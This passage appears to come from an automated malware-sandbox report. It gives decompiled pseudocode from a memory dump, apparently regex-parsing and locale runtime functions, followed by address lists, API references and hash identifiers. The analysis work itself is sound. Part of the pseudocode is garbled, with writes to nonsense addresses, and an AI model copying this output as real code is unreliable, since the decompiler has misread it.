												__eax = __al & 0x000000ff;
												_push(__al & 0x000000ff);
												_push(__ebx);
												goto L137;
											case 0xe:
												__edx =  *(__ebx + 0x14);
												__eax =  *(__ebp + 0x40);
												__eflags =  *(__edx + 0x24);
												__ecx =  *(__edx + 0x20);
												if( *(__edx + 0x24) == 0) {
													_push( *((intOrPtr*)(__eax + __ecx * 8)));
													 *(__edx + 8) =  *(__edx + 8) >> 1;
													__al = __al & 0x00000001;
													__eax = __al & 0x000000ff;
													_push(__al & 0x000000ff);
													_push(__edx);
													L137:
													__ecx = __ebp;
													__eax = E00408F70(__ebp, __edx);
													__edx =  *(__esp + 0x10);
													__eflags = __al;
													__ecx = __dl & 0x000000ff;
													__ecx =  ==  ? __edi : __dl & 0x000000ff;
													 *(__esp + 0x10) = __cl;
												}
												goto L148;
											case 0xf:
												__eflags =  *(__ebp + 0x60) & 0x00002020;
												if(( *(__ebp + 0x60) & 0x00002020) == 0) {
													L142:
													__eflags =  *((char*)(__ebp + 0x74));
													if( *((char*)(__ebp + 0x74)) == 0) {
														L145:
														__eflags =  *((char*)(__ebp + 0x64));
														if( *((char*)(__ebp + 0x64)) == 0) {
															L147:
															__ecx = __ebp + 0x20;
															__eax = E00404F10(__ecx, __ebp);
															 *((char*)(__ebp + 0x64)) = 1;
														} else {
															__ecx = __ebp;
															__eax = E00406D10(__ecx);
															__eflags = __al;
															if(__al != 0) {
																goto L147;
															}
														}
													} else {
														__eax =  *__ebp;
														__eflags =  *__ebp -  *((intOrPtr*)(__ebp + 0x50));
														if( *__ebp ==  *((intOrPtr*)(__ebp + 0x50))) {
															goto L145;
														} else {
															goto L144;
														}
													}
												} else {
													__eax =  *(__ebp + 0x4c);
													__eflags =  *(__ebp + 0x4c) -  *__ebp;
													if( *(__ebp + 0x4c) ==  *__ebp) {
														L144:
														 *(__esp + 0x10) = 1;
													} else {
														goto L142;
													}
												}
												goto L148;
										}
									}
									goto L159;
								}
							} else {
								_t361 = _t339 - 1;
								_t416[0x1e] = _t361;
								__eflags = _t361;
								if(__eflags <= 0) {
									goto L158;
								} else {
									goto L84;
								}
							}
						} else {
							_t363 = _t338 - 1;
							_t416[0x1f] = _t363;
							__eflags = _t363;
							if(__eflags <= 0) {
								E0041373B(_t374, _t406, __eflags, 0xc);
								L158:
								E0041373B(_t374, _t406, __eflags, 0xb);
								L159:
								E0041373B(_t374, _t406, __eflags, 0xd);
								_t424 = _t416;
								_pop(_t418);
								 *0xFFFFFFFFC10040F0 =  *((intOrPtr*)(0xffffffffc10040f0)) + _t387;
								 *0xFFFFFFFFFFFFFFF1 =  *((intOrPtr*)(0xfffffffffffffff1)) + _t402;
								 *((intOrPtr*)(_t387 - 0x30ffbf4f)) =  *((intOrPtr*)(_t387 - 0x30ffbf4f)) + 0x80;
								 *((intOrPtr*)(_t418 - 0x4e)) =  *((intOrPtr*)(_t418 - 0x4e)) + _t402;
								 *((intOrPtr*)(_t402 - 0x30ffbf4e)) =  *((intOrPtr*)(_t402 - 0x30ffbf4e)) + _t402;
								 *_t406 =  *_t406 + 0x40;
								 *((intOrPtr*)(0x40 + _t409 * 4)) =  *((intOrPtr*)(0x40 + _t409 * 4)) + 0x40;
								 *0xFFFFFFFFFFFFFFF3 =  *((intOrPtr*)(0xfffffffffffffff3)) + 0x43;
								 *0xFFFFFFFFCC0040F3 =  *((intOrPtr*)(0xffffffffcc0040f3)) + 0x44;
								asm("int3");
								asm("int3");
								asm("int3");
								_push(_t409);
								_t412 = 0x100;
								_t404 = E0041500C(0x40, __eflags, 0x14);
								_t425 =  &(_t424[1]);
								__eflags = _t404;
								if(_t404 == 0) {
									_t404 = 0;
									__eflags = 0;
								} else {
									 *_t404 = 0x437520;
									 *(_t404 + 4) = _t425[2];
									 *(_t404 + 8) = 0;
									 *(_t404 + 0xc) = 0;
									 *(_t404 + 0x10) = 0;
								}
								 *(_t404 + 0x10) =  *(_t412 + 4);
								_t353 =  *( *(_t412 + 4) + 0xc);
								__eflags = _t353;
								if(_t353 != 0) {
									 *(_t404 + 0xc) = _t353;
									 *( *( *(_t412 + 4) + 0xc) + 0x10) = _t404;
								}
								 *( *(_t412 + 4) + 0xc) = _t404;
								 *(_t412 + 4) = _t404;
								return _t404;
							} else {
								goto L82;
							}
						}
					} else {
						goto L2;
					}
				}
				L166:
			}

0x0040abd0
0x0040abd0
0x0040abd0
0x0040abd3
0x0040abd4
0x0040abd6
0x0040abdb
0x0040abe9
0x0040abe9
0x0040abee
0x0040abfc
0x0040abfc
0x0040abfd
0x0040abfe
0x0040ac04
0x0040ac08
0x0040ac0b
0x0040ac7b
0x0040ac7b
0x0040ac80
0x0040ac82
0x0040ac83
0x0040ac83
0x0040ac95
0x0040ac0d
0x0040ac0d
0x0040ac12
0x0040ac12
0x0040ac12
0x0040ac15
0x0040ac1b
0x00000000
0x00000000
0x0040ac21
0x00000000
0x0040ad3d
0x0040ad3f
0x00000000
0x0040ad45
0x0040ad45
0x00000000
0x0040ad45
0x00000000
0x00000000
0x0040ac28
0x0040ac35
0x00000000
0x0040ac37
0x0040ac3d
0x0040ac50
0x0040ac53
0x00000000
0x00000000
0x00000000
0x00000000
0x0040ac3d
0x00000000
0x00000000
0x0040ac5c
0x0040ac60
0x00000000
0x0040ac62
0x0040ac62
0x0040ac64
0x0040ac67
0x00000000
0x0040ac6d
0x0040ac6d
0x0040ac70
0x00000000
0x00000000
0x00000000
0x00000000
0x0040ac70
0x0040ac67
0x00000000
0x00000000
0x0040ac98
0x0040ac9b
0x0040ac9e
0x0040aca7
0x0040aca7
0x0040acaa
0x0040acb7
0x0040acb7
0x0040acb9
0x0040acbc
0x0040acca
0x0040acca
0x0040accd
0x0040acd6
0x0040acde
0x0040ace0
0x0040ace0
0x0040ace0
0x0040acbe
0x0040acbe
0x0040acc4
0x00000000
0x0040acc6
0x0040acc6
0x0040acc6
0x0040acc4
0x0040ace3
0x0040ace5
0x0040ace8
0x0040acee
0x0040acf0
0x0040acf9
0x0040ad01
0x0040ad03
0x0040ad03
0x0040ad03
0x0040acea
0x0040acea
0x0040acea
0x0040ad06
0x0040ad06
0x0040acac
0x0040acac
0x0040acae
0x0040acb1
0x00000000
0x00000000
0x00000000
0x00000000
0x0040acb1
0x0040aca0
0x0040aca0
0x0040aca2
0x0040aca5
0x0040acb3
0x0040acb3
0x00000000
0x00000000
0x00000000
0x0040aca5
0x0040ad08
0x0040ad0b
0x0040ad0d
0x0040ad0f
0x00000000
0x0040ad15
0x00000000
0x0040ad15
0x00000000
0x00000000
0x0040ad17
0x0040ad19
0x0040ad1c
0x00000000
0x0040ad22
0x0040ad22
0x0040ad24
0x0040ad27
0x00000000
0x0040ad2d
0x0040ad2d
0x0040ad30
0x00000000
0x0040ad36
0x0040ad36
0x0040ad36
0x00000000
0x0040ad36
0x0040ad30
0x0040ad27
0x00000000
0x00000000
0x0040ad65
0x0040ad6e
0x0040ad77
0x0040ad7f
0x0040ad81
0x00000000
0x0040ad87
0x0040ad37
0x0040ad37
0x00000000
0x0040ad37
0x00000000
0x00000000
0x0040ad89
0x0040ad8b
0x0040ad8e
0x00000000
0x0040ad94
0x0040ad94
0x0040ad95
0x0040ad97
0x0040ad9c
0x0040ad9e
0x00000000
0x0040ada4
0x0040ada4
0x0040ada6
0x0040ad4a
0x0040ad4c
0x00000000
0x0040ad52
0x0040ad52
0x0040ad57
0x00000000
0x0040ad5d
0x00000000
0x0040ad5d
0x0040ad57
0x0040ad4c
0x0040ad9e
0x00000000
0x00000000
0x0040adac
0x0040adae
0x0040adb1
0x0040adb4
0x0040adb9
0x0040adbd
0x0040adc1
0x0040adc9
0x0040adcc
0x0040add1
0x0040add5
0x0040adda
0x0040addc
0x0040adfd
0x0040ae01
0x0040ae05
0x0040ae07
0x0040adde
0x0040adde
0x0040ade2
0x0040ade5
0x0040adea
0x0040adee
0x0040adf3
0x0040adf3
0x00000000
0x00000000
0x0040aef8
0x0040aef8
0x00000000
0x00000000
0x0040ae11
0x0040ae14
0x0040ae17
0x0040ae19
0x0040ae1c
0x0040ae1f
0x0040ae22
0x0040ae28
0x0040ae2b
0x0040ae2e
0x0040ae31
0x0040ae34
0x0040ae36
0x0040ae38
0x0040ae3b
0x0040ae40
0x0040ae40
0x00000000
0x00000000
0x0040ae4a
0x0040ae4e
0x0040ae51
0x0040ae5d
0x0040ae5d
0x0040ae60
0x0040ae62
0x0040ae65
0x0040ae6b
0x0040ae6e
0x0040ae70
0x0040ae75
0x0040ae78
0x0040ae7b
0x0040ae7d
0x00000000
0x0040ae53
0x0040ae53
0x0040ae57
0x00000000
0x00000000
0x0040ae57
0x00000000
0x00000000
0x0040ae86
0x0040ae89
0x0040ae8b
0x0040ae8e
0x0040ae91
0x0040ae96
0x0040ae9b
0x0040ae9d
0x0040ae9f
0x0040ad39
0x0040ad39
0x00000000
0x0040aea5
0x0040aea5
0x0040aea8
0x0040aeaa
0x0040aeb1
0x0040aeb3
0x0040aed3
0x0040aed3
0x00000000
0x0040aeb5
0x0040aec6
0x0040aecb
0x0040aecd
0x0040ac76
0x0040ac76
0x00000000
0x00000000
0x00000000
0x00000000
0x0040aecd
0x0040aeb3
0x00000000
0x00000000
0x0040aeda
0x0040aedb
0x0040aedd
0x0040aee2
0x0040aee6
0x0040aee8
0x0040aeeb
0x0040aeed
0x0040aef1
0x0040aef4
0x00000000
0x00000000
0x0040aeff
0x0040af02
0x0040af04
0x0040af06
0x0040af08
0x0040af0a
0x0040af0d
0x0040af0e
0x0040af0f
0x0040af14
0x0040af18
0x0040af1d
0x0040af20
0x0040af22
0x0040af24
0x00000000
0x00000000
0x0040af2d
0x0040af30
0x0040af33
0x0040af37
0x0040af3a
0x00000000
0x0040af3c
0x0040af3c
0x0040af3f
0x0040af42
0x0040af44
0x0040af46
0x0040af48
0x0040af4b
0x0040af4c
0x0040af4d
0x0040af52
0x0040af56
0x0040af5b
0x0040af5e
0x0040af60
0x0040af62
0x0040af62
0x00000000
0x00000000
0x0040af6b
0x0040af72
0x0040af7b
0x0040af7b
0x0040af7f
0x0040af95
0x0040af95
0x0040af99
0x0040afa6
0x0040afa7
0x0040afaa
0x0040afaf
0x0040af9b
0x0040af9b
0x0040af9d
0x0040afa2
0x0040afa4
0x00000000
0x00000000
0x0040afa4
0x0040afb3
0x0040afb3
0x0040afb7
0x0040af81
0x0040af81
0x0040af83
0x0040af86
0x00000000
0x00000000
0x00000000
0x00000000
0x0040af86
0x0040af74
0x0040af74
0x0040af77
0x0040af79
0x0040af88
0x0040af88
0x0040af8a
0x0040af8c
0x00000000
0x00000000
0x00000000
0x0040af79
0x00000000
0x00000000
0x0040ac21
0x00000000
0x0040ac12
0x0040abf0
0x0040abf0
0x0040abf1
0x0040abf6
0x00000000
0x00000000
0x00000000
0x00000000
0x0040abf6
0x0040abdd
0x0040abdd
0x0040abde
0x0040abe3
0x0040afc0
0x0040afc5
0x0040afc7
0x0040afcc
0x0040afce
0x0040afd4
0x0040afd9
0x0040afda
0x0040afdb
0x0040afdf
0x0040afe5
0x0040afe6
0x0040afe7
0x0040afeb
0x0040aff1
0x0040aff3
0x0040aff9
0x0040affb
0x0040b003
0x0040b005
0x0040b007
0x0040b00b
0x0040b011
0x0040b013
0x0040b019
0x0040b01b
0x0040b021
0x0040b023
0x0040b029
0x0040b02a
0x0040b02b
0x0040b02c
0x0040b02d
0x0040b02e
0x0040b02f
0x0040b030
0x0040b033
0x0040b034
0x0040b036
0x0040b039
0x0040b03b
0x0040b049
0x0040b049
0x0040b04c
0x0040b04e
0x0040b05c
0x0040b05c
0x0040b05d
0x0040b061
0x0040b066
0x0040b067
0x0040b068
0x0040b06a
0x0040b3e4
0x0040b3e4
0x00000000
0x0040b070
0x0040b070
0x0040b075
0x0040b075
0x0040b075
0x0040b078
0x0040b07b
0x0040b07e
0x00000000
0x00000000
0x0040b084
0x00000000
0x0040b3c9
0x0040b3c9
0x00000000
0x00000000
0x0040b08b
0x0040b095
0x0040b098
0x00000000
0x0040b09a
0x0040b09a
0x0040b0a0
0x0040b0ae
0x0040b0ae
0x0040b0b1
0x0040b0b5
0x0040b0b8
0x0040b0a2
0x0040b0a5
0x0040b0a8
0x00000000
0x00000000
0x00000000
0x00000000
0x0040b0a8
0x0040b3cd
0x0040b3cd
0x0040b3cf
0x00000000
0x00000000
0x00000000
0x00000000
0x0040b3cf
0x00000000
0x00000000
0x0040b0c1
0x0040b0c5
0x00000000
0x0040b0c7
0x0040b0c7
0x0040b0ca
0x0040b0cd
0x00000000
0x0040b0d3
0x0040b0d3
0x0040b0d6
0x00000000
0x00000000
0x00000000
0x00000000
0x0040b0d6
0x0040b0cd
0x00000000
0x00000000
0x0040b0e3
0x0040b0e6
0x0040b0e9
0x0040b0f3
0x0040b0f3
0x0040b0f6
0x0040b104
0x0040b104
0x0040b107
0x0040b10a
0x0040b11b
0x0040b11b
0x0040b11e
0x0040b127
0x0040b12f
0x0040b131
0x0040b131
0x0040b131
0x0040b10c
0x0040b10c
0x0040b112
0x00000000
0x0040b114
0x0040b114
0x0040b114
0x0040b112
0x0040b136
0x0040b139
0x0040b13c
0x0040b142
0x0040b144
0x0040b14d
0x0040b155
0x0040b157
0x0040b157
0x0040b157
0x0040b13e
0x0040b13e
0x0040b13e
0x0040b15a
0x0040b15a
0x0040b0f8
0x0040b0f8
0x0040b0fb
0x0040b0fe
0x00000000
0x00000000
0x00000000
0x00000000
0x0040b0fe
0x0040b0eb
0x0040b0eb
0x0040b0ee
0x0040b0f1
0x0040b100
0x0040b100
0x00000000
0x00000000
0x00000000
0x0040b0f1
0x0040b15e
0x0040b161
0x0040b163
0x0040b165
0x00000000
0x0040b16b
0x00000000
0x0040b16b
0x00000000
0x00000000
0x0040b170
0x0040b173
0x0040b176
0x00000000
0x0040b17c
0x0040b17c
0x0040b17e
0x0040b181
0x00000000
0x0040b187
0x0040b187
0x0040b18a
0x00000000
0x0040b190
0x0040b191
0x00000000
0x0040b191
0x0040b18a
0x0040b181
0x00000000
0x00000000
0x0040b19c
0x0040b1a5
0x0040b1a5
0x0040b1ac
0x0040b1b4
0x00000000
0x00000000
0x0040b1cf
0x0040b1d2
0x0040b1d5
0x00000000
0x0040b1db
0x0040b1db
0x0040b1dc
0x0040b1de
0x0040b1e3
0x0040b1e5
0x00000000
0x0040b1eb
0x0040b1eb
0x0040b3d1
0x0040b3d1
0x0040b3d3
0x00000000
0x0040b3d5
0x0040b3d5
0x0040b3d8
0x0040b3dc
0x0040b3de
0x00000000
0x00000000
0x00000000
0x00000000
0x0040b3de
0x0040b3d3
0x0040b1e5
0x00000000
0x00000000
0x0040b1f5
0x0040b1f8
0x0040b1fb
0x0040b1fe
0x0040b203
0x0040b207
0x0040b20f
0x0040b212
0x0040b214
0x0040b218
0x0040b21c
0x0040b21f
0x0040b224
0x0040b226
0x0040b23b
0x0040b228
0x0040b228
0x0040b22c
0x0040b22f
0x0040b234
0x0040b234
0x0040b23e
0x0040b242
0x0040b247
0x0040b24b
0x00000000
0x00000000
0x0040b3c7
0x0040b3c7
0x0040b3c7
0x00000000
0x00000000
0x0040b255
0x0040b258
0x0040b25b
0x0040b25e
0x0040b261
0x0040b264
0x0040b267
0x0040b270
0x0040b273
0x0040b276
0x0040b279
0x0040b27c
0x0040b27e
0x0040b280
0x0040b283
0x0040b288
0x0040b288
0x00000000
0x00000000
0x0040b292
0x0040b296
0x0040b299
0x0040b2a5
0x0040b2a5
0x0040b2a8
0x0040b2aa
0x0040b2ad
0x0040b2b3
0x0040b2b6
0x0040b2b8
0x0040b2bd
0x0040b2c0
0x0040b2c3
0x0040b2c6
0x0040b29b
0x0040b29b
0x0040b29f
0x00000000
0x00000000
0x0040b29f
0x00000000
0x00000000
0x0040b2cf
0x0040b2d2
0x0040b2d4
0x0040b2d7
0x0040b2da
0x0040b2dd
0x0040b2df
0x0040b2e2
0x0040b2e4
0x0040b2e6
0x0040b2e8
0x00000000
0x0040b2ee
0x0040b2ee
0x0040b2f1
0x0040b2f4
0x0040b2f7
0x0040b2f9
0x0040b2fc
0x0040b2fe
0x0040b1c7
0x0040b1c7
0x00000000
0x0040b304
0x0040b310
0x0040b315
0x0040b1b9
0x0040b1b9
0x0040b1bb
0x0040b1be
0x0040b1c1
0x0040b0dc
0x0040b0dc
0x0040b3e8
0x0040b3e8
0x0040b3eb
0x0040b3ed
0x0040b3ef
0x0040b3ef
0x0040b3f0
0x0040b3f0
0x0040b3f5
0x0040b3f8
0x0040b3f8
0x0040b3ff
0x00000000
0x00000000
0x00000000
0x0040b1c1
0x0040b2fe
0x00000000
0x00000000
0x0040b31f
0x0040b320
0x0040b322
0x0040b327
0x0040b32b
0x0040b330
0x0040b333
0x00000000
0x00000000
0x0040b33f
0x0040b341
0x0040b341
0x0040b343
0x0040b345
0x0040b348
0x0040b349
0x00000000
0x00000000
0x0040b363
0x0040b366
0x0040b369
0x0040b36d
0x0040b370
0x0040b372
0x0040b378
0x0040b37a
0x0040b37c
0x0040b37f
0x0040b380
0x0040b34a
0x0040b34a
0x0040b34c
0x0040b351
0x0040b355
0x0040b357
0x0040b35a
0x0040b35d
0x0040b35d
0x00000000
0x00000000
0x0040b383
0x0040b38a
0x0040b394
0x0040b394
0x0040b398
0x0040b3a9
0x0040b3a9
0x0040b3ad
0x0040b3ba
0x0040b3bb
0x0040b3be
0x0040b3c3
0x0040b3af
0x0040b3af
0x0040b3b1
0x0040b3b6
0x0040b3b8
0x00000000
0x00000000
0x0040b3b8
0x0040b39a
0x0040b39a
0x0040b39d
0x0040b3a0
0x00000000
0x00000000
0x00000000
0x00000000
0x0040b3a0
0x0040b38c
0x0040b38c
0x0040b38f
0x0040b392
0x0040b3a2
0x0040b3a2
0x00000000
0x00000000
0x00000000
0x0040b392
0x00000000
0x00000000
0x0040b084
0x00000000
0x0040b075
0x0040b050
0x0040b050
0x0040b051
0x0040b054
0x0040b056
0x00000000
0x00000000
0x00000000
0x00000000
0x0040b056
0x0040b03d
0x0040b03d
0x0040b03e
0x0040b041
0x0040b043
0x0040b404
0x0040b409
0x0040b40b
0x0040b410
0x0040b412
0x0040b418
0x0040b418
0x0040b41b
0x0040b427
0x0040b42b
0x0040b447
0x0040b44b
0x0040b453
0x0040b45b
0x0040b45f
0x0040b467
0x0040b46d
0x0040b46e
0x0040b46f
0x0040b470
0x0040b473
0x0040b47a
0x0040b47c
0x0040b47f
0x0040b481
0x0040b4a7
0x0040b4a7
0x0040b483
0x0040b487
0x0040b48d
0x0040b490
0x0040b497
0x0040b49e
0x0040b49e
0x0040b4ac
0x0040b4b2
0x0040b4b5
0x0040b4b7
0x0040b4b9
0x0040b4c2
0x0040b4c2
0x0040b4ca
0x0040b4cd
0x0040b4d1
0x00000000
0x00000000
0x00000000
0x0040b043
0x00000000
0x00000000
0x00000000
0x0040abe3
0x00000000

APIs

___from_strstr_to_strchr.LIBCMT ref: 0040ACD6
___from_strstr_to_strchr.LIBCMT ref: 0040ACF9

Part of subcall function 0041373B: std::regex_error::regex_error.LIBCPMT ref: 00413747
Part of subcall function 0041373B: __CxxThrowException@8.LIBVCRUNTIME ref: 00413755

Strings

abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_, xrefs: 0040ACD1, 0040ACF4, 0040B122, 0040B148

Memory Dump Source

Source File: 00000005.00000001.1669075870.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.1668983266.00400000.00000002.sdmp Download File
Associated: 00000005.00000001.1670705928.00437000.00000002.sdmp Download File
Associated: 00000005.00000001.1670872174.0044A000.00000008.sdmp Download File
Associated: 00000005.00000001.1670885737.0044B000.00000004.sdmp Download File
Associated: 00000005.00000001.1670906384.00450000.00000008.sdmp Download File
Associated: 00000005.00000001.1670915612.00451000.00000002.sdmp Download File

Similarity

API ID: ___from_strstr_to_strchr$Exception@8Throwstd::regex_error::regex_error
String ID: abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_
API String ID: 451488043-3812731148
Opcode ID: 1d94e12d4939a0fa6e3d7c758fce23a025af7542bcd6975c2dca8772f6000972
Instruction ID: 446b4e58f663590d2d6b2cfb39d7770ac085953162540ea36e1fa59aece1ce0d
Opcode Fuzzy Hash: 1d94e12d4939a0fa6e3d7c758fce23a025af7542bcd6975c2dca8772f6000972
Instruction Fuzzy Hash: EFC1B0B12087069FD714CF24C490A6AB7E2BF45304F54482EE442AB781D738FC75DBAA

Uniqueness

Uniqueness Score: 3.53%

Function 0042F601, Relevance: 4.7, APIs: 3, Instructions: 206
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E0042F601(void* __ecx, void* __edx, void* __eflags, void* __fp0, intOrPtr _a4) {
				signed int _v8;
				short _v248;
				signed int _v252;
				intOrPtr _v256;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t50;
				int _t56;
				signed int _t58;
				void* _t73;
				signed int _t77;
				intOrPtr _t79;
				signed int _t80;
				void* _t88;
				signed int _t89;
				signed int _t91;
				intOrPtr _t92;
				void* _t94;
				signed int _t113;
				signed int _t117;
				intOrPtr* _t119;
				intOrPtr* _t124;
				signed int _t127;
				signed int _t128;
				void* _t129;
				signed int* _t131;
				int _t135;
				signed int _t137;
				void* _t138;
				void* _t151;

				_t153 = __fp0;
				_t50 =  *0x44b6b4; // 0x4a5cc10f
				_v8 = _t50 ^ _t137;
				_t94 = E004251AF(__ecx, __edx, __fp0);
				_t131 =  *(E004251AF(__ecx, __edx, __fp0) + 0x34c);
				_t135 = E0042F92D(_a4);
				asm("sbb ecx, ecx");
				_t56 = GetLocaleInfoW(_t135, ( ~( *(_t94 + 0x64)) & 0xfffff005) + 0x1002,  &_v248, 0x78);
				_v252 = _v252 & 0x00000000;
				if(_t56 == 0) {
					L37:
					 *_t131 = 0;
					_t58 = 1;
					__eflags = 1;
					L38:
					E00415A87();
					return _t58;
				}
				if(E0042C37A(_t94, _t131, _t135,  *((intOrPtr*)(_t94 + 0x54)),  &_v248) != 0) {
					L16:
					if(( *_t131 & 0x00000300) == 0x300) {
						L36:
						_t58 =  !( *_t131 >> 2) & 0x00000001;
						goto L38;
					}
					asm("sbb eax, eax");
					if(GetLocaleInfoW(_t135, ( ~( *(_t94 + 0x60)) & 0xfffff002) + 0x1001,  &_v248, 0x78) == 0) {
						goto L37;
					}
					_t73 = E0042C37A(_t94, _t131, _t135,  *((intOrPtr*)(_t94 + 0x50)),  &_v248);
					if(_t73 != 0) {
						__eflags =  *(_t94 + 0x60);
						if( *(_t94 + 0x60) != 0) {
							goto L36;
						}
						__eflags =  *(_t94 + 0x5c);
						if( *(_t94 + 0x5c) == 0) {
							goto L36;
						}
						__eflags = E0042C37A(_t94, _t131, _t135,  *((intOrPtr*)(_t94 + 0x50)),  &_v248);
						if(__eflags != 0) {
							goto L36;
						}
						_push(_t131);
						_t77 = E0042FA86(__eflags, _t153, _t135, 0);
						__eflags = _t77;
						if(_t77 == 0) {
							goto L36;
						}
						 *_t131 =  *_t131 | 0x00000100;
						__eflags = _t131[1];
						L34:
						if(_t151 == 0) {
							_t131[1] = _t135;
						}
						goto L36;
					}
					_t113 =  *_t131 | 0x00000200;
					 *_t131 = _t113;
					if( *(_t94 + 0x60) == _t73) {
						__eflags =  *(_t94 + 0x5c) - _t73;
						if( *(_t94 + 0x5c) == _t73) {
							goto L20;
						}
						_t124 =  *((intOrPtr*)(_t94 + 0x50));
						_v256 = _t124 + 2;
						do {
							_t79 =  *_t124;
							_t124 = _t124 + 2;
							__eflags = _t79 - _v252;
						} while (_t79 != _v252);
						__eflags = _t124 - _v256 >> 1 -  *(_t94 + 0x5c);
						if(__eflags != 0) {
							_t73 = 0;
							goto L20;
						}
						_push(_t131);
						_t80 = E0042FA86(__eflags, _t153, _t135, 1);
						__eflags = _t80;
						if(_t80 == 0) {
							goto L36;
						}
						 *_t131 =  *_t131 | 0x00000100;
						_t73 = 0;
						L21:
						_t151 = _t131[1] - _t73;
						goto L34;
					}
					L20:
					 *_t131 = _t113 | 0x00000100;
					goto L21;
				}
				asm("sbb eax, eax");
				if(GetLocaleInfoW(_t135, ( ~( *(_t94 + 0x60)) & 0xfffff002) + 0x1001,  &_v248, 0x78) == 0) {
					goto L37;
				}
				_t88 = E0042C37A(_t94, _t131, _t135,  *((intOrPtr*)(_t94 + 0x50)),  &_v248);
				_t117 =  *_t131;
				if(_t88 != 0) {
					__eflags = _t117 & 0x00000002;
					if((_t117 & 0x00000002) != 0) {
						goto L16;
					}
					__eflags =  *(_t94 + 0x5c);
					if( *(_t94 + 0x5c) == 0) {
						L12:
						_t127 =  *_t131;
						__eflags = _t127 & 0x00000001;
						if((_t127 & 0x00000001) != 0) {
							goto L16;
						}
						_t89 = E0042FA61(_t135);
						__eflags = _t89;
						if(_t89 == 0) {
							goto L16;
						}
						_t128 = _t127 | 0x00000001;
						__eflags = _t128;
						 *_t131 = _t128;
						goto L15;
					}
					_t91 = E004332B5(_t94, _t117, _t135,  *((intOrPtr*)(_t94 + 0x50)),  &_v248,  *(_t94 + 0x5c));
					_t138 = _t138 + 0xc;
					__eflags = _t91;
					if(_t91 != 0) {
						goto L12;
					}
					 *_t131 =  *_t131 | 0x00000002;
					__eflags =  *_t131;
					_t131[2] = _t135;
					_t119 =  *((intOrPtr*)(_t94 + 0x50));
					_t129 = _t119 + 2;
					do {
						_t92 =  *_t119;
						_t119 = _t119 + 2;
						__eflags = _t92 - _v252;
					} while (_t92 != _v252);
					__eflags = _t119 - _t129 >> 1 -  *(_t94 + 0x5c);
					if(_t119 - _t129 >> 1 ==  *(_t94 + 0x5c)) {
						_t131[1] = _t135;
					}
				} else {
					_t131[1] = _t135;
					 *_t131 = _t117 | 0x00000304;
					L15:
					_t131[2] = _t135;
				}
			}

0x0042f601
0x0042f60c
0x0042f613
0x0042f621
0x0042f629
0x0042f638
0x0042f644
0x0042f655
0x0042f65b
0x0042f664
0x0042f83e
0x0042f840
0x0042f842
0x0042f842
0x0042f843
0x0042f84b
0x0042f853
0x0042f853
0x0042f67d
0x0042f738
0x0042f743
0x0042f832
0x0042f839
0x00000000
0x0042f839
0x0042f757
0x0042f76d
0x00000000
0x00000000
0x0042f77d
0x0042f786
0x0042f7f4
0x0042f7f7
0x00000000
0x00000000
0x0042f7f9
0x0042f7fc
0x00000000
0x00000000
0x0042f80f
0x0042f811
0x00000000
0x00000000
0x0042f813
0x0042f818
0x0042f820
0x0042f822
0x00000000
0x00000000
0x0042f824
0x0042f82a
0x0042f82d
0x0042f82d
0x0042f82f
0x0042f82f
0x00000000
0x0042f82d
0x0042f78a
0x0042f790
0x0042f795
0x0042f7a7
0x0042f7aa
0x00000000
0x00000000
0x0042f7ac
0x0042f7b2
0x0042f7b8
0x0042f7b8
0x0042f7bb
0x0042f7be
0x0042f7be
0x0042f7cf
0x0042f7d2
0x0042f7ee
0x00000000
0x0042f7ee
0x0042f7d4
0x0042f7d8
0x0042f7e0
0x0042f7e2
0x00000000
0x00000000
0x0042f7e4
0x0042f7ea
0x0042f79f
0x0042f79f
0x00000000
0x0042f79f
0x0042f797
0x0042f79d
0x00000000
0x0042f79d
0x0042f691
0x0042f6a7
0x00000000
0x00000000
0x0042f6b7
0x0042f6be
0x0042f6c2
0x0042f6d1
0x0042f6d4
0x00000000
0x00000000
0x0042f6d6
0x0042f6da
0x0042f71e
0x0042f71e
0x0042f720
0x0042f723
0x00000000
0x00000000
0x0042f726
0x0042f72c
0x0042f72e
0x00000000
0x00000000
0x0042f730
0x0042f730
0x0042f733
0x00000000
0x0042f733
0x0042f6e9
0x0042f6ee
0x0042f6f1
0x0042f6f3
0x00000000
0x00000000
0x0042f6f5
0x0042f6f5
0x0042f6f8
0x0042f6fb
0x0042f6fe
0x0042f701
0x0042f701
0x0042f704
0x0042f707
0x0042f707
0x0042f714
0x0042f717
0x0042f719
0x0042f719
0x0042f6c4
0x0042f6ca
0x0042f6cd
0x0042f735
0x0042f735
0x0042f735

APIs

Part of subcall function 004251AF: GetLastError.KERNEL32(00000008,?,1FFFFFFF,00420A55,?,?,00413761,?,?,h}D,?), ref: 004251B4
Part of subcall function 004251AF: _free.LIBCMT ref: 00425211
Part of subcall function 004251AF: _free.LIBCMT ref: 00425247
Part of subcall function 004251AF: SetLastError.KERNEL32(00000000,00000005,000000FF,?,1FFFFFFF,00420A55,?,?,00413761,?,?,h}D,?), ref: 00425252

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0042F655
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0042F69F
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0042F765

Part of subcall function 0042FA86: GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0042F81D,00000000,00000000,?), ref: 0042FAB2

Part of subcall function 00415A87: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00416245
Part of subcall function 00415A87: ___raise_securityfailure.LIBCMT ref: 0041632C

Memory Dump Source

Source File: 00000005.00000001.1669075870.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.1668983266.00400000.00000002.sdmp Download File
Associated: 00000005.00000001.1670705928.00437000.00000002.sdmp Download File
Associated: 00000005.00000001.1670872174.0044A000.00000008.sdmp Download File
Associated: 00000005.00000001.1670885737.0044B000.00000004.sdmp Download File
Associated: 00000005.00000001.1670906384.00450000.00000008.sdmp Download File
Associated: 00000005.00000001.1670915612.00451000.00000002.sdmp Download File

Similarity

API ID: InfoLocale$ErrorLast_free$FeaturePresentProcessor___raise_securityfailure
String ID:
API String ID: 3595462271-0
